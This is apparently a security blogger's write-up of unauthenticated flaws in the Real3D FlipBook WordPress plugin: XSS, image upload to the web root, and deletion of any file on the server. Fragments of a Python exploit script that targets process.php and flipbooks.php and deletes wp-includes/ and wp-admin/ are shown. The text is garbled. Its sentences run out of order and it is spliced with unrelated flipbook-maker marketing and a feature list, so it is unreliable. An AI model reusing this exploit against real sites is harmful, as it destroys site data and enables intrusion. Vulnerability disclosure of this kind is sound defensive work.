After executing this exploit, the WordPress site doesn't load because the exploit deletes all the files in wp-includes/.

print(tabs + '* Multiple Vulnerabilities Found by: *')
print(tabs + '* CodeCanyon Real3D FlipBook WordPress Plugin *')
os.system('cls' if os.name == 'nt' else 'clear')
print(' ' + self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php?action=' + self.payload3 + '&bookId=' + self.payload3)
r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/flipbooks.php', self.payload3)
print(' Image has been uploaded here ' + self.url + '/' + self.payload2 + '.jpg')

You can also choose to add engaging elements such as audio, video, external links, and more. The flipbook converter will create an interactive flipbook for you to download.

r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload2, True)

To turn a PDF into a flip book, use an online flipbook maker app and just upload your PDF.

print(' Uploading image file in target root directory')
print(' Files have been deleted successfully')
encodedImage = base64.b64encode(r.content)

Anyone can download the software for free to create attractive mobile content for readers. It can help to create an interactive, rich, and engaging mobile experience without writing one line of code.

r = self.http(self.url + '/wp-content/plugins/real3d-flipbook/includes/process.php', self.payload1, True)

Mobissue is a PDF flip book maker designed exclusively for mobile users.

print(' Deleting Files from wp-includes/ & wp-admin/')

This vulnerability exists in the file wp-content/plugins/real3d-flipbook/includes/process.php.

Delete Files or Directories (Unauthenticated)

Let's take a look at these vulnerabilities individually.
- Cross Site Scripting (XSS) vulnerability.
- Upload images in Root directory (Unauthenticated).
- Delete any file or directory from the server (Unauthenticated).

While auditing this plugin, I found some critical vulnerabilities which can be exploited by an unauthenticated user and do some real damage to our WordPress installation. We usually audit the code and add some tweaks first. We don't install the plugins directly on our WordPress instance. The company I work for bought this plugin a few days ago and decided to use it on our WordPress blog for the company featured magazine. You can find further details on the official CodeCanyon page.

At the time of writing this post, the plugin costs $32 with $9.60 for extended 12 months support. We can upload PDF files or JPEG images and it will automatically make an interactive flipbook for WordPress posts and pages.

Real 3D Flipbook is a WordPress plugin which uses Web Graphics Library to create 3D flip books.

- social share – facebook, twitter, google plus.
- customizable menu – use only icons that you need.
- retina friendly icons – icon font used for menu icons, fully customizable – change color, size, add drop shadow etc.
- real fullscreen support – if fullscreen is not supported by the browser, the icon will not be shown in the menu, if fullscreen is supported it will expand the book in real full screen mode, not browser full screen.
- advanced zooming support with mouse wheel zoom on desktop, pinch zoom on mobile, scrollbars when zoomed, touch swipe, click and drag.
- choose between 3 types of flip animation – webgl realistic 3d, jquery 2d or CSS3 3d flip animation; customizable animation speed and transition type.
- smart page loading – only current pages are loaded.
- optimized for mobile – look and feel of a native app on mobile with touch swipe, pinch zoom etc.
- responsive design – book resizes so it fits screen width or screen height depending on the layout, thumbnails are placed horizontally or vertically depending on the layout.
- real 3d – lights, shadows, page bending.